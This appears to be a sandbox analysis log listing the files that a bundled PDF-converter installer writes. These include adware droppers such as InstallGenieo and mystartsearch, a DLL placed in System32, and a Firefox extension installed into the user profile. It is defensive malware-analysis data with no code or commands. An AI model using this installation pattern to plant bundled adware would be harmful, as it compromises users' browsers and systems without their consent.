%Program Files% (x86)\GPLGS\p052024l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\gs_t.xbm (353 bytes)
%Program Files% (x86)\GPLGS\gs_pdf_e.ps (1 bytes)
%Program Files% (x86)\GPLGS\acctest.ps (4 bytes)
%Program Files% (x86)\GPLGS\b018032l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_mgl_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\pdf_draw.ps (41 bytes)
%Program Files% (x86)\GPLGS\pdf_font.ps (43 bytes)
%Program Files% (x86)\GPLGS\viewpcx.ps (4 bytes)
%Program Files% (x86)\GPLGS\n022003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\Fontmap (113 bytes)
%Program Files% (x86)\GPLGS\gs_sepr.ps (8 bytes)
%Program Files% (x86)\GPLGS\gs_typ32.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_lev2.ps (31 bytes)
%Program Files% (x86)\GPLGS\c059013l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\b018012l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gswin32c.exe (601 bytes)
%Program Files% (x86)\GPLGS\gs_type1.ps (7 bytes)
%Program Files% (x86)\GPLGS\type1enc.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_ce_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_lgo_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\addxchar.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_frsd.ps (3 bytes)
%Program Files% (x86)\GPLGS\rollconv.ps (12 bytes)
%Program Files% (x86)\GPLGS\gs_cff.ps (22 bytes)
%Program Files% (x86)\GPLGS\Info-macos.plist (483 bytes)
%Program Files% (x86)\GPLGS\gs_wl1_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_css_e.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_ksb_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_l.xbm (1 bytes)
%Program Files% (x86)\GPLGS\ht_ccsto.ps (1281 bytes)
%Program Files% (x86)\GPLGS\gs_il2_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_t_m.xbm (363 bytes)
%Program Files% (x86)\GPLGS\Fontmap.Sol (16 bytes)
%Program Files% (x86)\GPLGS\uninfo.ps (6 bytes)
%Program Files% (x86)\GPLGS\pdf_rbld.ps (13 bytes)
%Program Files% (x86)\GPLGS\Fontmap.OSF (6 bytes)
%Program Files% (x86)\GPLGS\gs_devcs.ps (6 bytes)
%Program Files% (x86)\GPLGS\decrypt.ps (369 bytes)
%Program Files% (x86)\GPLGS\gs_dps2.ps (7 bytes)
%Program Files% (x86)\GPLGS\p052023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ttf.ps (43 bytes)
%Program Files% (x86)\GPLGS\pdf_ops.ps (21 bytes)
%Program Files% (x86)\GPLGS\viewjpeg.ps (5 bytes)
%Program Files% (x86)\GPLGS\pdfopt.ps (37 bytes)
%Program Files% (x86)\GPLGS\pdf_sec.ps (10 bytes)
%Program Files% (x86)\GPLGS\type1ops.ps (7 bytes)
%Program Files% (x86)\GPLGS\printafm.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_btokn.ps (11 bytes)
%Program Files% (x86)\GPLGS\a010035l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n022004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_dscp.ps (4 bytes)
%Program Files% (x86)\GPLGS\Fontmap.GS (13 bytes)
%Program Files% (x86)\GPLGS\gsdll32.dll (19686 bytes)
%Program Files% (x86)\GPLGS\gs_l.xpm (2 bytes)
%Program Files% (x86)\GPLGS\gs_cspace.ps (30 bytes)
%Program Files% (x86)\GPLGS\showpage.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_std_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\wftopfa.ps (9 bytes)
%Program Files% (x86)\GPLGS\stcolor.ps (5 bytes)
%Program Files% (x86)\GPLGS\pf2afm.ps (15 bytes)
%Program Files% (x86)\GPLGS\gs_statd.ps (13 bytes)
%Program Files% (x86)\GPLGS\gs_typ42.ps (1 bytes)
%Program Files% (x86)\GPLGS\docie.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_cmdl.ps (5 bytes)
%Program Files% (x86)\GPLGS\prfont.ps (6 bytes)
%Program Files% (x86)\GPLGS\gs_sym_e.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_s_m.xbm (615 bytes)
%Program Files% (x86)\GPLGS\caption.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_cidfm.ps (4 bytes)
%Program Files% (x86)\GPLGS\pphs (220 bytes)
%Program Files% (x86)\GPLGS\gs_icc.ps (10 bytes)
%Program Files% (x86)\GPLGS\gs_epsf.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_ciecs2.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_devn.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_dps.ps (8 bytes)
%Program Files% (x86)\GPLGS\n019024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\level1.ps (117 bytes)
%Program Files% (x86)\GPLGS\gs_resst.ps (5 bytes)
%Program Files% (x86)\GPLGS\Fontmap.OS2 (7 bytes)
%Program Files% (x86)\GPLGS\c059033l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_rdlin.ps (886 bytes)
%Program Files% (x86)\GPLGS\gs_dpnxt.ps (4 bytes)
%Program Files% (x86)\GPLGS\cid2code.ps (4 bytes)
%Program Files% (x86)\GPLGS\n021023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ciddc.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_init.ps (601 bytes)
%Program Files% (x86)\GPLGS\gs_cidtt.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_img.ps (22 bytes)
%Program Files% (x86)\GPLGS\gs_pfile.ps (4 bytes)
%Program Files% (x86)\GPLGS\c059036l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\c059016l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_m_m.xbm (971 bytes)
%Program Files% (x86)\GPLGS\Fontmap.ATM (5 bytes)
%Program Files% (x86)\GPLGS\markpath.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_devpxl.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_cidcm.ps (16 bytes)
%Program Files% (x86)\GPLGS\gs_diskn.ps (7 bytes)
%Program Files% (x86)\GPLGS\n019044l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n022024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_cmap.ps (17 bytes)
%Program Files% (x86)\GPLGS\Fontmap.ATB (6 bytes)
%Program Files% (x86)\GPLGS\pdf2dsc.ps (5 bytes)
%Program Files% (x86)\GPLGS\pphs.ps (7 bytes)
%Program Files% (x86)\GPLGS\unprot.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_fform.ps (3 bytes)
%Program Files% (x86)\GPLGS\landscap.ps (1 bytes)
%Program Files% (x86)\GPLGS\wrfont.ps (18 bytes)
%Program Files% (x86)\GPLGS\lines.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_cidfn.ps (13 bytes)
%Program Files% (x86)\GPLGS\gs_mex_e.ps (4 bytes)
%Program Files% (x86)\GPLGS\gs_lgx_e.ps (1 bytes)
%Program Files% (x86)\GPLGS\traceimg.ps (1 bytes)
%Program Files% (x86)\GPLGS\gs_l2img.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_ccfnt.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_kanji.ps (4 bytes)
%Program Files% (x86)\GPLGS\a010033l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_l_m.xbm (1 bytes)
%Program Files% (x86)\GPLGS\a010015l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\pfbtopfa.ps (1 bytes)
%Program Files% (x86)\GPLGS\b018015l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n019064l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\Fontmap.SGI (14 bytes)
%Program Files% (x86)\GPLGS\ppath.ps (2 bytes)
%Program Files% (x86)\GPLGS\viewpbm.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_res.ps (35 bytes)
%Program Files% (x86)\GPLGS\gs_s.xbm (605 bytes)
%Program Files% (x86)\GPLGS\n019004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_m.xpm (1 bytes)
%Program Files% (x86)\GPLGS\gs_m.xbm (961 bytes)
%Program Files% (x86)\GPLGS\s050000l.pfb (33 bytes)
%Program Files% (x86)\GPLGS\p052004l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\font2c.ps (20 bytes)
%Program Files% (x86)\GPLGS\stcinfo.ps (26 bytes)
%Program Files% (x86)\GPLGS\gs_t.xpm (633 bytes)
%Program Files% (x86)\GPLGS\gslp.ps (20 bytes)
%Program Files% (x86)\GPLGS\pcharstr.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_dbt_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_patrn.ps (8 bytes)
%Program Files% (x86)\GPLGS\xlatmap (1 bytes)
%Program Files% (x86)\GPLGS\n019023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\ps2ai.ps (23 bytes)
%Program Files% (x86)\GPLGS\gs_indxd.ps (5 bytes)
%Program Files% (x86)\GPLGS\gs_trap.ps (3 bytes)
%Program Files% (x86)\GPLGS\errpage.ps (8 bytes)
%Program Files% (x86)\GPLGS\n019003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\stocht.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_mro_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\bdftops.ps (24 bytes)
%Program Files% (x86)\GPLGS\winmaps.ps (3 bytes)
%Program Files% (x86)\GPLGS\viewgif.ps (4 bytes)
%Program Files% (x86)\GPLGS\pdf_base.ps (25 bytes)
%Program Files% (x86)\GPLGS\gs_s.xpm (993 bytes)
%Program Files% (x86)\GPLGS\pdf_main.ps (35 bytes)
%Program Files% (x86)\GPLGS\gs_dps1.ps (4 bytes)
%Program Files% (x86)\GPLGS\n022023l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\n021003l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\d050000l.pfb (45 bytes)
%Program Files% (x86)\GPLGS\gs_wl5_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_agl.ps (29 bytes)
%Program Files% (x86)\GPLGS\impath.ps (5 bytes)
%Program Files% (x86)\GPLGS\pdfwrite.ps (10 bytes)
%Program Files% (x86)\GPLGS\COPYING (17 bytes)
%Program Files% (x86)\GPLGS\gs_pdfwr.ps (21 bytes)
%Program Files% (x86)\GPLGS\a010013l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\jispaper.ps (961 bytes)
%Program Files% (x86)\GPLGS\showchar.ps (3 bytes)
%Program Files% (x86)\GPLGS\font2pcl.ps (18 bytes)
%Program Files% (x86)\GPLGS\viewmiff.ps (3 bytes)
%Program Files% (x86)\GPLGS\n021024l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_resmp.ps (21 bytes)
%Program Files% (x86)\GPLGS\n019043l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\align.ps (2 bytes)
%Program Files% (x86)\GPLGS\p052003l.pfb (673 bytes)
%Program Files% (x86)\GPLGS\gs_setpd.ps (28 bytes)
%Program Files% (x86)\GPLGS\b018035l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_ll3.ps (10 bytes)
%Program Files% (x86)\GPLGS\image-qa.ps (601 bytes)
%Program Files% (x86)\GPLGS\gs_fapi.ps (9 bytes)
%Program Files% (x86)\GPLGS\n019063l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_fntem.ps (11 bytes)
%Program Files% (x86)\GPLGS\gs_ciecs3.ps (3 bytes)
%Program Files% (x86)\GPLGS\packfile.ps (10 bytes)
The process Setup.exe:468 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Program Files% (x86)\MyPDFConverter\setup.inf (312 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT5.DLL (4185 bytes)
%Program Files% (x86)\MyPDFConverter\README.HTM (4 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT.HLP (26 bytes)
C:\Windows\System32\spool\drivers\x64\CUSTPDFW.PPD (31 bytes)
%Program Files% (x86)\MyPDFConverter\setup\unInstpw64.exe (24 bytes)
%Program Files% (x86)\MyPDFConverter\PDFWrite.rsp (116 bytes)
C:\Windows\System32\spool\drivers\x64\PS5UI.DLL (5873 bytes)
%Program Files% (x86)\MyPDFConverter\CPWriter2.exe (601 bytes)
%Program Files% (x86)\MyPDFConverter\unInstpw64.exe (23 bytes)
%Program Files% (x86)\MyPDFConverter\Preferences.exe (24 bytes)
%Program Files% (x86)\MyPDFConverter\setup\Converter.exe (678 bytes)
C:\Windows\System32\spool\drivers\x64\PSCRIPT.NTF (7433 bytes)
%Program Files% (x86)\MyPDFConverter\pdfwriter.exe (43 bytes)
The process appshat.exe:4072 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\StdUtils.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\Qzcggrhivnxb.tmp (455919 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\Vlwgfsqfpaz.exe (1749665 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1058.bat (411 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\FacebookIsGod.dll (2552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_d (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_e (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_b (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_c (167333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_a (167333 bytes)
The process biclient.exe:2452 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.7 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.6 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\eula[1].htm (1056 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.5 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.2 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.4 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.3 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (1156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.1 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.2 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe (21724 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\eula[2].htm (1056 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.1 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.0 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe (70607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\mydpfconv icon[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.4 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.5 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.1 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.0 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.3 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.2 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.5 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.4 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.7 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.6 (5224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\tokyo_sprite_full[1].png (1300 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5P76D326.txt (97 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\eula-mystartsearch[1].htm (1871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.3 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.0 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\4b5cb7aab8d80a4ba5daaec3cbcf46f0[1].htm (43893 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.6 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.7 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.1 (9352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp (40116 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.7 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.6 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.5 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.4 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.3 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.2 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\eula-sourceapp[1].htm (4319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.0 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8CO6P6LD.txt (94 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F365.tmp (79808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe (22888 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\tokyoThreeWavesBG[1].jpg (200 bytes)
The process unInstpw64.exe:2004 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Windows\System32\custmon64.dll (601 bytes)
The process 11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe:3456 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\221.js (419 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\234.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\288.js (557 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\354.js (5118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\dbe88a314f000d3b15042465fdf21cc5.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\1.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\crossrider_statusbar.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\c422d0a33c0be34d39a93687c738b5f0.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\255.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\icon24.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button1.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\7df47bd2f0a36fc56fb4d5f85d879331.js (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\2edcf1d6343b69377b1b5ab704fc0dba.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\ab9e8724735655aca91d2a7b089e2a0b.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\install.rdf (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\263.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\72.js (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\911be52d07701495078e83a9206b167f.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\17f548e3cc7f3ff5ea90135d36d5617d.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\9.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\04e8dd99d8507cb819f5842891bb38e1.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\skin.css (909 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\8d67ab46bd5bcae77c6c6b11b5654720.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\22.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\301.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\ddf2e4e66be71a3aa501f0f1d81c9768.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\ffCoreFilesIndex.txt (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\262.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button5.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\d2eb933c47d0580044f729e920ee557c.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\281.js (489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\183.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\userCode\extension.js (358 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\184.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\182.js (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\253.js (741 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\options.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\panelarrow-up.png (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\180.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button2.png (5 bytes)
